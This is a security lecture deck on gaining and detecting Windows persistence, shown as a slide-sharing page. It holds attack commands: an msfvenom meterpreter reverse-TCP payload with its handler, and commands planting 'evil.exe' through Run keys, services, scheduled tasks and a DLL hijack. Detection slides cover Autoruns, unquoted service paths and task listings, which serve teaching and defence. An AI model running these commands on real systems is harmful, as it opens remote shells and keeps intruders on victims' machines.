Abstract image of a woman sitting on books and studying on a laptop

Windows persistence presentation

O
OlehLevytskyi1

The document covers techniques for achieving and detecting persistence on Windows systems, particularly in the context of cybersecurity. It details methods for using Windows registry keys, services, scheduled tasks, and DLL hijacking to ensure malicious programs run at startup. Additionally, it provides commands for creating autoruns and detecting existing persistence mechanisms.

Education
Related topics:
Threat Hunting
1 of 29
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Gaining and detecting Windows Persistence Prepared by: Levytskyi Oleg Student ZI-41 Security Analyst
WARNING The materials of the lecture are presented only for EDUCATIONAL PURPOSES. The speaker is not responsible for the use of this information for illegal purposes
root@kali:~# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f exe -o evill.exe root@kali:~# msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST 192.168.0.2 //(your ip) msf > set LPORT 4444 //(your port) msf > exploit Creating payload
Typical Attack. V1 Hm. smth go wrong I want to reboot system Destination host unreachable run exploit cmd shell>_ Connection Lost
Attack. V2 Hm. smth go wrong I want to reboot system run exploit cmd shell>_ HKLMSoftwareMicrosoftWindowsCurrentVersionRun Connection Lost System is starting cmd shell>_
So, what is persistence? What kind of persistence do you know? Is it really a huge problem?
Persistence causes programs to run each time that a user logs on or system starts. Usually in background. “Hackers use persistence, not zero days to breach companies”
Registry autoruns Run/RunOnce Keys ● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion Run ● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion RunOnce ● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run ● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion RunOnce ● HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPolicies Keys used by WinLogon Process ● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion Winlogon ● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon Shell Startup Keys ● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer User Shell Folders ● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer Shell Folders ● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorer Shell Folders ● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorer User …
Create autorun cmd> reg add “HKLMSOFTWARE MicrosoftWindowsCurrentVersionRun” /f /V "My" /t REG_SZ /D "C:...evil.exe" OR PS> Set-ItemProperty "HKLM:Software MicrosoftWindowsCurrentVersionRun" -Name “My” -Value "C:...evil.exe" … and reboot;)
But sometimes life becomes harder
And when the best one gives up
For the help comes...
Autorun. How to detect? Link: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns This utility, which has the most comprehensive knowledge of auto-starting locations of any startup monitor, shows you what programs are configured to run during system bootup or login.
Services
Create new service cmd> sc create My binpath="C:...evil.exe" type=own start=auto OR PS> New-Service -Name "My" -BinaryPathName "C:...evil.exe" -DisplayName "My" -StartupType Automatic
Сhange service path Registry Path: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices
Services. How to look at them? powershell command: PS> Get-Service PS> Get-WmiObject Win32_Service
Services. Real-world situation
Unquoted service path C:PROGRAM FILESSUB DIRPROGRAM NAME C:PROGRAM*FILESSUB*DIRPROGRAM*NAME ● c:program.exe filessub dirprogram name ● c:program filessub.exe dirprogram name ● c:program filessub dirprogram.exe name
Unquoted service path. How to detect? cmd>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows" |findstr /i /v """
Unquoted service path. How to resolve?
Schedule tasks V1 (at). How? cmd> at 08:00 /EVERY:m,t,w,th,f,s,su "C:...evil.exe" (ALWAYS SYSTEM priv) C:Windowssystem32> at /? The AT command schedules commands and programs to run on a computer at a specified time and date. The Schedule service must be running to use the AT command. AT [computername] [ [id] [/DELETE] | /DELETE [/YES]] AT [computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...]] "command"
Schedule tasks V2 cmd> SchTasks /Create /SC DAILY /TN “My” /TR "C:...evil.exe" /ST 17:00
Schedule tasks. How to detect? cmd> schtasks /query /FO CSV /v > schtasks.csv
DLL hijacking and PATH magic Dynamic-link library (or DLL) is Microsoft's implementation of the shared library concept in the Microsoft Windows and OS/2 operating systems. With both implicit and explicit linking, Windows first searches for "known DLLs", such as Kernel32.dll and User32.dll. Windows then searches for the DLLs in the following sequence: 1. The directory where the executable module for the current process is located. 2. The current directory. 3. The Windows system directory. The GetSystemDirectory function retrieves the path of this directory. 4. The Windows directory. The GetWindowsDirectory function retrieves the path of this directory. 5. The directories listed in the PATH environment variable. ...Do you know your PATH?
DLL hijacking and PATH magic PS C:UsersleoDesktop> echo $env:PATH C:Windowssystem32;C:Windows;C:WindowsSystem32Wbem;C:WindowsSystem32 WindowsPowerShellv1.0;C:Program FilesOpenVPNbin; C:Python27 PS C:UsersleoDesktop> (Get-ACL C:Python27).Access NT AUTHORITYAuthenticated Users FullAccess PS C:UsersleoDesktop> cp wlbsctrl.dll C:Python27
Shortcut hijacking
Check in form Link: https://goo.gl/forms/HxB915h8NDm83VGj1
Thank you for listening!

More Related Content

PPTX
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
PDF
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
Felipe Prado
 
PPTX
Hiding in plain sight
Rob Gillen
 
PDF
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
PDF
Docker Plugin For DevSecOps
Pichaya Morimoto
 
PDF
Awesome_fuzzing_for _pentester_red-pill_2017
Manich Koomsusi
 
PDF
Mini CTF workshop dump
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
PDF
Possibility of arbitrary code execution by Step-Oriented Programming
kozossakai
 
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
Felipe Prado
 
Hiding in plain sight
Rob Gillen
 
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Docker Plugin For DevSecOps
Pichaya Morimoto
 
Awesome_fuzzing_for _pentester_red-pill_2017
Manich Koomsusi
 
Mini CTF workshop dump
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Possibility of arbitrary code execution by Step-Oriented Programming
kozossakai
 

What's hot (20)

PDF
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
idsecconf
 
PDF
Monit
Abhishek Singh
 
PDF
Nikto
Sorina Chirilă
 
PPTX
Indicators of compromise: From malware analysis to eradication
Michael Boman
 
PDF
The Art of Grey-Box Attack
Prathan Phongthiproek
 
PDF
Php logging
Brent Laminack
 
PDF
Laura Garcia - Shodan API and Coding Skills [rooted2019]
RootedCON
 
PPTX
Penetration Testing Boot CAMP
Shaikh Jamal Uddin l CISM, QRadar, Hack Card Recovery Expert
 
PDF
Footprinting tools for security auditors
Jose Manuel Ortega Candel
 
PPTX
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
 
PDF
Richard wartell malware is hard. let's go shopping!!
Shakacon
 
PPTX
BackTrack 4 R2 - SFISSA Presentation
Jorge Orchilles
 
PDF
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
CODE BLUE
 
PDF
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
PDF
TRENDnet IP Camera Multiple Vulnerabilities
insight-labs
 
PDF
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
RootedCON
 
PDF
"A rootkits writer’s guide to defense" - Michal Purzynski
PROIDEA
 
PDF
Proactive monitoring with Monit
OSOCO
 
ODP
Pycon Sec
guesta762e4
 
PDF
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
idsecconf
 
Monit
Abhishek Singh
 
Nikto
Sorina Chirilă
 
Indicators of compromise: From malware analysis to eradication
Michael Boman
 
The Art of Grey-Box Attack
Prathan Phongthiproek
 
Php logging
Brent Laminack
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
RootedCON
 
Penetration Testing Boot CAMP
Shaikh Jamal Uddin l CISM, QRadar, Hack Card Recovery Expert
 
Footprinting tools for security auditors
Jose Manuel Ortega Candel
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
 
Richard wartell malware is hard. let's go shopping!!
Shakacon
 
BackTrack 4 R2 - SFISSA Presentation
Jorge Orchilles
 
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
CODE BLUE
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
TRENDnet IP Camera Multiple Vulnerabilities
insight-labs
 
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
RootedCON
 
"A rootkits writer’s guide to defense" - Michal Purzynski
PROIDEA
 
Proactive monitoring with Monit
OSOCO
 
Pycon Sec
guesta762e4
 
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
Ad

Similar to Windows persistence presentation (20)

PDF
74 Methods for Privilege Escalation Part 2
Hadess
 
PDF
40 Methods for Privilege Escalation Part 1
Hadess
 
PDF
Methods for Privilege Escalation Part One.pdf
rimaNova1
 
PDF
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
CODE BLUE
 
PDF
Penetrating Windows 8 with syringe utility
IOSR Journals
 
PDF
Bsides NYC 2018 - Hunting for Lateral Movement
Mauricio Velazco
 
PDF
Metasploit Humla for Beginner
n|u - The Open Security Community
 
PDF
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Mauricio Velazco
 
PDF
Privilege Escalation Techniques and methodology.pdf
harshvikramshahi2
 
DOC
Boot prom basics
Ganesh Kumar Veerla
 
PPTX
Penetration Testing and Intrusion Detection System
Bikrant Gautam
 
PPTX
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
CODE BLUE
 
PPT
How hackers attack networks
Adeel Javaid
 
PDF
A journey through the years of UNIX and Linux service management
Lubomir Rintel
 
DOC
Hijack This
Kitty
 
PPTX
Windows Command Line Tools
love4upratik
 
DOCX
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
pauline234567
 
PDF
AMS Node Meetup December presentation Phusion Passenger
icemobile
 
PPTX
Windows xp compromise and remedies
Bikrant Gautam
 
PPT
Laboratory exercise - Network security - Penetration testing
seastorm44
 
74 Methods for Privilege Escalation Part 2
Hadess
 
40 Methods for Privilege Escalation Part 1
Hadess
 
Methods for Privilege Escalation Part One.pdf
rimaNova1
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
CODE BLUE
 
Penetrating Windows 8 with syringe utility
IOSR Journals
 
Bsides NYC 2018 - Hunting for Lateral Movement
Mauricio Velazco
 
Metasploit Humla for Beginner
n|u - The Open Security Community
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Mauricio Velazco
 
Privilege Escalation Techniques and methodology.pdf
harshvikramshahi2
 
Boot prom basics
Ganesh Kumar Veerla
 
Penetration Testing and Intrusion Detection System
Bikrant Gautam
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
CODE BLUE
 
How hackers attack networks
Adeel Javaid
 
A journey through the years of UNIX and Linux service management
Lubomir Rintel
 
Hijack This
Kitty
 
Windows Command Line Tools
love4upratik
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
pauline234567
 
AMS Node Meetup December presentation Phusion Passenger
icemobile
 
Windows xp compromise and remedies
Bikrant Gautam
 
Laboratory exercise - Network security - Penetration testing
seastorm44
 
Ad

Recently uploaded (20)

DOCX
Ibrahim Suliman Mukhtar CV5AUG2025.docx
AhmedMukhtar64
 
PDF
Farming Based Livelihood Systems English Notes
Akhil Agriculture
 
PDF
Compact First Student's Book Cambridge Official
TunHng48
 
PDF
Literature_Review_methods_ BRACU_MKT426 course material
mokoto4834
 
PPTX
ACFE CERTIFICATION TRAINING ON LAW.pptx
Godwin Emmanuel Oyedokun MBA MSc PhD FCA FCTI FCNA CFE FFAR
 
PDF
fundamentals-of-heat-and-mass-transfer-6th-edition_incropera.pdf
gloryjsingh
 
PDF
The TKT Course. Modules 1, 2, 3.for self study
Aydelina Medina
 
PDF
Nurlina - Urban Planner Portfolio (english ver)
Nurlina Y.
 
PDF
0520_Scheme_of_Work_(for_examination_from_2021).pdf
SankariNandakumar
 
PDF
faiz-khans about Radiotherapy Physics-02.pdf
FrancisKazoba
 
PDF
MICROENCAPSULATION_NDDS_BPHARMACY__SEM VII_PCI Syllabus.pdf
SabsKhan1
 
PDF
PUBH1000 - Module 6: Global Health Tute Slides
Jonathan Hallett
 
PPTX
2025 High Blood Pressure Guideline Slide Set.pptx
Ramesh Kumar
 
PDF
LIFE & LIVING TRILOGY - PART - (2) THE PURPOSE OF LIFE.pdf
sureshkumarsoni26
 
PDF
Journal of Dental Science - UDMY (2021).pdf
Nay Aung
 
PDF
Journal of Dental Science - UDMY (2022).pdf
Nay Aung
 
PPTX
Integrated Management of Neonatal and Childhood Illnesses (IMNCI) – Unit IV |...
RAKESH SAJJAN
 
PDF
M.Tech in Aerospace Engineering | BIT Mesra
BIT Mesra
 
PPTX
CAPACITY BUILDING PROGRAMME IN ADOLESCENT EDUCATION
JDKPS
 
PDF
Fun with Grammar (Communicative Activities for the Azar Grammar Series)
JohanaWulandari2
 
Ibrahim Suliman Mukhtar CV5AUG2025.docx
AhmedMukhtar64
 
Farming Based Livelihood Systems English Notes
Akhil Agriculture
 
Compact First Student's Book Cambridge Official
TunHng48
 
Literature_Review_methods_ BRACU_MKT426 course material
mokoto4834
 
ACFE CERTIFICATION TRAINING ON LAW.pptx
Godwin Emmanuel Oyedokun MBA MSc PhD FCA FCTI FCNA CFE FFAR
 
fundamentals-of-heat-and-mass-transfer-6th-edition_incropera.pdf
gloryjsingh
 
The TKT Course. Modules 1, 2, 3.for self study
Aydelina Medina
 
Nurlina - Urban Planner Portfolio (english ver)
Nurlina Y.
 
0520_Scheme_of_Work_(for_examination_from_2021).pdf
SankariNandakumar
 
faiz-khans about Radiotherapy Physics-02.pdf
FrancisKazoba
 
MICROENCAPSULATION_NDDS_BPHARMACY__SEM VII_PCI Syllabus.pdf
SabsKhan1
 
PUBH1000 - Module 6: Global Health Tute Slides
Jonathan Hallett
 
2025 High Blood Pressure Guideline Slide Set.pptx
Ramesh Kumar
 
LIFE & LIVING TRILOGY - PART - (2) THE PURPOSE OF LIFE.pdf
sureshkumarsoni26
 
Journal of Dental Science - UDMY (2021).pdf
Nay Aung
 
Journal of Dental Science - UDMY (2022).pdf
Nay Aung
 
Integrated Management of Neonatal and Childhood Illnesses (IMNCI) – Unit IV |...
RAKESH SAJJAN
 
M.Tech in Aerospace Engineering | BIT Mesra
BIT Mesra
 
CAPACITY BUILDING PROGRAMME IN ADOLESCENT EDUCATION
JDKPS
 
Fun with Grammar (Communicative Activities for the Azar Grammar Series)
JohanaWulandari2
 

Windows persistence presentation

  • 1. Gaining and detecting Windows Persistence Prepared by: Levytskyi Oleg Student ZI-41 Security Analyst
  • 2. WARNING The materials of the lecture are presented only for EDUCATIONAL PURPOSES. The speaker is not responsible for the use of this information for illegal purposes
  • 3. root@kali:~# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f exe -o evill.exe root@kali:~# msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST 192.168.0.2 //(your ip) msf > set LPORT 4444 //(your port) msf > exploit Creating payload
  • 4. Typical Attack. V1 Hm. smth go wrong I want to reboot system Destination host unreachable run exploit cmd shell>_ Connection Lost
  • 5. Attack. V2 Hm. smth go wrong I want to reboot system run exploit cmd shell>_ HKLMSoftwareMicrosoftWindowsCurrentVersionRun Connection Lost System is starting cmd shell>_
  • 6. So, what is persistence? What kind of persistence do you know? Is it really a huge problem?
  • 7. Persistence causes programs to run each time that a user logs on or system starts. Usually in background. “Hackers use persistence, not zero days to breach companies”
  • 8. Registry autoruns Run/RunOnce Keys ● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion Run ● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion RunOnce ● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run ● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion RunOnce ● HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPolicies Keys used by WinLogon Process ● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion Winlogon ● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon Shell Startup Keys ● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer User Shell Folders ● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer Shell Folders ● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorer Shell Folders ● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorer User …
  • 9. Create autorun cmd> reg add “HKLMSOFTWARE MicrosoftWindowsCurrentVersionRun” /f /V "My" /t REG_SZ /D "C:...evil.exe" OR PS> Set-ItemProperty "HKLM:Software MicrosoftWindowsCurrentVersionRun" -Name “My” -Value "C:...evil.exe" … and reboot;)
  • 10. But sometimes life becomes harder
  • 11. And when the best one gives up
  • 12. For the help comes...
  • 13. Autorun. How to detect? Link: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns This utility, which has the most comprehensive knowledge of auto-starting locations of any startup monitor, shows you what programs are configured to run during system bootup or login.
  • 15. Create new service cmd> sc create My binpath="C:...evil.exe" type=own start=auto OR PS> New-Service -Name "My" -BinaryPathName "C:...evil.exe" -DisplayName "My" -StartupType Automatic
  • 16. Сhange service path Registry Path: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices
  • 17. Services. How to look at them? powershell command: PS> Get-Service PS> Get-WmiObject Win32_Service
  • 19. Unquoted service path C:PROGRAM FILESSUB DIRPROGRAM NAME C:PROGRAM*FILESSUB*DIRPROGRAM*NAME ● c:program.exe filessub dirprogram name ● c:program filessub.exe dirprogram name ● c:program filessub dirprogram.exe name
  • 20. Unquoted service path. How to detect? cmd>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows" |findstr /i /v """
  • 21. Unquoted service path. How to resolve?
  • 22. Schedule tasks V1 (at). How? cmd> at 08:00 /EVERY:m,t,w,th,f,s,su "C:...evil.exe" (ALWAYS SYSTEM priv) C:Windowssystem32> at /? The AT command schedules commands and programs to run on a computer at a specified time and date. The Schedule service must be running to use the AT command. AT [computername] [ [id] [/DELETE] | /DELETE [/YES]] AT [computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...]] "command"
  • 23. Schedule tasks V2 cmd> SchTasks /Create /SC DAILY /TN “My” /TR "C:...evil.exe" /ST 17:00
  • 24. Schedule tasks. How to detect? cmd> schtasks /query /FO CSV /v > schtasks.csv
  • 25. DLL hijacking and PATH magic Dynamic-link library (or DLL) is Microsoft's implementation of the shared library concept in the Microsoft Windows and OS/2 operating systems. With both implicit and explicit linking, Windows first searches for "known DLLs", such as Kernel32.dll and User32.dll. Windows then searches for the DLLs in the following sequence: 1. The directory where the executable module for the current process is located. 2. The current directory. 3. The Windows system directory. The GetSystemDirectory function retrieves the path of this directory. 4. The Windows directory. The GetWindowsDirectory function retrieves the path of this directory. 5. The directories listed in the PATH environment variable. ...Do you know your PATH?
  • 26. DLL hijacking and PATH magic PS C:UsersleoDesktop> echo $env:PATH C:Windowssystem32;C:Windows;C:WindowsSystem32Wbem;C:WindowsSystem32 WindowsPowerShellv1.0;C:Program FilesOpenVPNbin; C:Python27 PS C:UsersleoDesktop> (Get-ACL C:Python27).Access NT AUTHORITYAuthenticated Users FullAccess PS C:UsersleoDesktop> cp wlbsctrl.dll C:Python27
  • 28. Check in form Link: https://goo.gl/forms/HxB915h8NDm83VGj1
  • 29. Thank you for listening!